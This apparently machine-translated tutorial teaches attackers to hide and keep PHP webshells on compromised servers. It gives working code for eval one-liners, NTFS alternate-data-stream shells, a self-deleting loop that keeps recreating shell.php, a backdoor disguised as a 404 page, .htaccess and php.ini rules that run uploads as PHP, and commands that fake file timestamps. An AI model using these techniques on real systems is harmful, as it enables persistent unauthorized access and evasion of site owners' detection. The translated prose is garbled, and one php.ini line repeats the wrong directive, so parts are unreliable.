PHP backdoor hiding skills

If you want your own Webshell Stay longer , except Webshell Don't kill , There are also some hidden techniques to be aware of , Like hiding files , Modify time properties , Hide file contents, etc .

---

1、 Hidden files

Use Attrib +s +a +h +r The command is to add system file properties to the original folder 、 Archive properties 、 Read only file properties and hidden file properties .

attrib +s +a +h +r shell.php   // hide shell.php file 

2、 Modify the file time attribute

When you try to hide your newly created files in a bunch of files , that , In addition to creating a confusing file name , You also need to change the revision date of the file .

// Modification time modification Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"// The visit time was modified Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"// Creation time modification Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"

Use the command to get the file properties

Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force

Modify the creation and modification time of all files in a folder

powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime =  Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"

3、 utilize ADS Hide file content

On the server echo A data stream file goes in , such as index.php It's a normal web page file , We can do it like this ：　

echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg

This creates an invisible shell hidden.jpg, Regular file manager 、type command ,dir command 、del The order couldn't find that hidden.jpg Of .

utilize include function , take index.php:hidden.jpg Conduct hex code , Put this ADS file include go in , In this way, we can analyze our sentence normally .

<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>

4、 The undead horse

The undead horse will delete itself , Loop to create hidden backdoors in the form of processes .

<?phpset_time_limit(0);  ignore_user_abort(1); unlink(__FILE__);     // Delete yourself while(1){        file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>');  // establish shell.php, It's better to use the sentence of no killing here     sleep(10);    // Time interval between }?>

The simplest and most effective way to deal with it , Restart the service and delete it webshell file .

5、 Middleware back door

Will be compiled so File copy to modules Folder , Start the back door module , restart Apache. When sending a string past for a specific parameter , Can trigger the back door .

github Project address ：

https://github.com/VladRico/apache2_BackdoorMod

6、 utilize 404 Page hidden back door

404 The page is mainly used to enhance the user experience , Can be used to hide backdoor files .

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html><?php@preg_replace("/[pageerror]/e",$_POST['error'],"saft");header('HTTP/1.1 404 Not Found');?>

7、 utilize .htaccess Document composition PHP back door

commonly .htaccess It can be used to leave backdoors and bypass blacklists , Create... In the upload directory .htaccess File is written to , It doesn't need to be restarted to take effect , Upload png File parsing .

AddType application/x-httpd-php .png

in addition , stay .htaccess Join in php Parsing rules , Include the file name with 1 Analysis into php, Upload 1.txt It can be parsed .

<FilesMatch "1"> SetHandler application/x-httpd-php </FilesMatch>

8、 utilize php.ini Hide backdoor files

php.ini You can specify the name of the file that will be automatically resolved before and after the execution of the main file , Commonly used in the common header and tail of a page , It can also be used to hide php back door .

; stay PHP Automatically add files before documents .auto_prepend_file = "c:\tmp.txt"; stay PHP Automatically add files after the document .auto_prepend_file = "c:\tmp.txt"

Need to restart the service to take effect , Visit any one of php File is available webshell.